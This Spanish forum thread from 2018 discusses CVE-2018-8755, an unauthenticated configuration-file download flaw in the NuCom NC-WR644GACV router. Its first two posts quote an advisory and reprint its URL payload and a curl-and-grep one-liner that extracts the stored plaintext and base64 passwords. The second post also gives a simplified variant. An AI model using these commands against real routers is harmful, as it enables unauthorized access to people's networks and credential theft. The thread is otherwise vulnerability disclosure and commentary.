El libre pensamiento para un internet libre

No estas registrado.  

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 06-07-2018 23:02:18

dymusya
Very Important Usuario

Registrado: 19-04-2015
Mensajes: 174

Obtener la contrasela de un NuCom NC-WR644GACV

Hola amigos ,hace tiempo no pasaba por aqui, para no abrir nuevo hilo, y solo por dejar si no habeis escuchado de esta brecha, os dejo aqui.
saludos.
Overview
========
Researchers of NVEL4 Cybersecurity company have discovered that it is
possible to access to the config file bypassing admin authentication and
authorization. The vulnerability has been reported to the vendor. The
vendor has confirmed the vulnerability but not issued to security advisory.

The recommendation to affected users is to update to the latest available
version and change the credentials used, since they could have been
extracted.

Some NuCom routers are exposed to internet.
Product Details
=============
* Type: Router / Access Point (Wireless Dual Band Gigabit VoIP Router)
* Vendor: NuCom
* Model Name: NC-WR644GACV
* Vulnerable Software Version: <= STA 005
* Fixed Software Version: STA 006

Vulnerability Details
===================
* CVE: 2018-8755
* Name: Unauthenticated Configuration File Download
* Type: Authentication / Authorization Bypass
* Description: An unauthorizated user can download config file by
accessing to the URL directly
* Payload: http://[hostname]/cgi-bin/config_download.cgi?action=download
* Impact: By downloading the config file an attacker can read all
password stored in plain-text and base64 then access vie web as
administrator and gain privileged control of the device.

PoC
====

[email protected]:~$ curl -s "http://vulnerable.hostname/
cgi-bin/config_download.cgi?action=download"|strings|grep -i password
InternetGatewayDevice.X_CT-COM_UserInfo.UserList.1.Password_realtext=[PLAIN
PASSWORD HERE]
InternetGatewayDevice.WANDevice.2.WANConnectionDevice.1.
WANPPPConnection.1.Password=[BASE64 PASSWORD HERE]
InternetGatewayDevice.X_CT-COM_UserInfo.UserList.2.Password_realtext=[PLAIN
TEXT PASSWORD HERE]
InternetGatewayDevice.LANDevice.1.WLANConfiguration.5.WPS.PeerPassword=[PLAIN
TEXT PASSWORD HERE]
InternetGatewayDevice.X_CT-COM_UserInfo.UserList.1.Password=[SHA256
PASSWORD HERE]
InternetGatewayDevice.X_CT-COM_UserInfo.UserList.2.Password=[SHA256
PASSWORD HERE]
InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.WPS.PeerPassword=[PLAIN
TEXT PASSWORD HERE]
InternetGatewayDevice.ManagementServer.Password=[BASE64 PASSWORD HERE]
InternetGatewayDevice.ManagementServer.ConnectionRequestPassword=[BASE64
PASSWORD HERE]
[email protected]:~

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#2 08-07-2018 19:20:49

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,418

Re: Obtener la contrasela de un NuCom NC-WR644GACV

Es mejor abrir un hilo nuevo porque es una brecha muy diferente. wink
Gracias por reportar la vulnerabilidad; dejo aquí el link hacía la publicación de la brecha :

Y una imagen para visualizar la cosa:

nucom_1.jpg

De aspecto es un poco... ...Bruto. Pero si se abre fácilmente y que está bien ventilado (han hecho agujeros, no se han cortado)¿Qué más da?
Las antenas son externas smile , se parecen como dos gotas de agua a las antenas de las Alfa (y son buenas) pero están fijadas a la placa (¡mal! sad )   
  Tiene un puerto USB 3.0.

Hay también una nota en español sobre la vulnerabilidad: [CVE-2018-8755] Vulnerabilidad en los dispositivos Nucom WR644GACV
La entrada no explica los detalles pero habéis visto que no es complicado: La interfaz de gestión web está mal montada.
Se puede descargar el fichero de configuración sin tener que entrar los credenciales.
Solo hace falta entrar esta URL en la barra de navegación de su navegador y obtendréis el fichero :

http://[hostname]/cgi-bin/config_download.cgi?action=download

(En lugar de hostname ponéis la puerta de enlace)
Los datos sensibles están guardados en texto plano o "cifrados"
Hacer un exploit para sacar los credenciales es de lo más trivial.
Sin buscar complicaciones podemos sacar los credenciales con una linea bash.

curl -s "http://vulnerable.hostname/cgi-bin/config_download.cgi?action=download"|strings|grep -i password

Usamos wget o curl para descargar el fichero y depuramos la salida con grep buscando la palabra "password"
El resultado es... "sorprendente"

InternetGatewayDevice.X_CT-COM_UserInfo.UserList.1.Password_realtext=[PLAIN
PASSWORD HERE]
InternetGatewayDevice.WANDevice.2.WANConnectionDevice.1.
WANPPPConnection.1.Password=[BASE64 PASSWORD HERE]
InternetGatewayDevice.X_CT-COM_UserInfo.UserList.2.Password_realtext=[PLAIN
TEXT PASSWORD HERE]
InternetGatewayDevice.LANDevice.1.WLANConfiguration.5.WPS.PeerPassword=[PLAIN
TEXT PASSWORD HERE]
InternetGatewayDevice.X_CT-COM_UserInfo.UserList.1.Password=[SHA256
PASSWORD HERE]
InternetGatewayDevice.X_CT-COM_UserInfo.UserList.2.Password=[SHA256
PASSWORD HERE]
InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.WPS.PeerPassword=[PLAIN
TEXT PASSWORD HERE]
InternetGatewayDevice.ManagementServer.Password=[BASE64 PASSWORD HERE]
InternetGatewayDevice.ManagementServer.ConnectionRequestPassword=[BASE64
PASSWORD HERE]
[email protected]:~$

*** Sensitive information has been removed and replaced by [...]

Podríamos simplificar la salida limitándonos a pillar  unicamente la primera ocurrencia visto que la contraseña sale en texto claro en la primera ocurrencia.

curl -s "http://vulnerable.hostname/cgi-bin/config_download.cgi?action=download" | strings | grep -m1 -i password

Lo que no llego a entender es por qué cifran la contraseña con sha256 (robusto) y por otro lado la dejan al lado en texto plano  pam

Es una brecha muy seria y Nucom no ha publicado parches de momento
  Será interesante ver como reaccionan. 
¿Estamos hablando de gente que montan material barato de china para venderlo o hay algo más?
  La primera impresión no es buena porque son brechas muy groseras. El error es humano, pero este error ha sido cometido tantas veces en material barato de los años 2010.
Encontrar este tipo de cagada en un router ac 1200 (como mucho del 2015) da a temer lo peor. tongue

Si esta gente conocen su oficio y tiene ética profesional todo esto debería arreglarse rápido, no es nada complicado.
Si son unos sin vergüenzas la brecha quedará abierta.
Por lo menos veremos rápido de que madera están hecho
  Qué será será big_smile

Desconectado

#3 08-07-2018 20:25:12

josep345
Usuario

Registrado: 19-11-2017
Mensajes: 637

Re: Obtener la contrasela de un NuCom NC-WR644GACV

Que interesante wink como bien dices sheriff falta saber si serán tan gañanes como para no hacer nada,, o se plantean una actualización y tapan la brecha. 


Debes Aprender que puedes hacer Todo bien y aun así fallar.

Creación Alargador USB-3.0 Con Cable RJ45   

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

Temas similares

Tema Respuestas Vistas Ultimo mensaje
0 33 Ayer 16:57:54 por nekue
Pyrit vs Hashcat por bala
12 245 Ayer 13:06:03 por bala
Hostbase 1.2 está aqui por Koala  [ 1 2 3 4 5 ]
122 7076 Ayer 12:00:51 por nekue
1 91 Ayer 08:13:39 por kcdtv
20 2372 24-09-2018 12:26:50 por kcdtv

Pie de página

Información del usuario

Ultimo usuario registrado: Moscus
Usuarios registrados conectados: 0
Invitados conectados: 14

Estadisticas de los foros

Número total de usuarios registrados: 1,195
Número total de temas: 1,182
Número total de mensajes: 12,235

Máx. usuarios conectados: 69 el 15-10-2017 09:23:21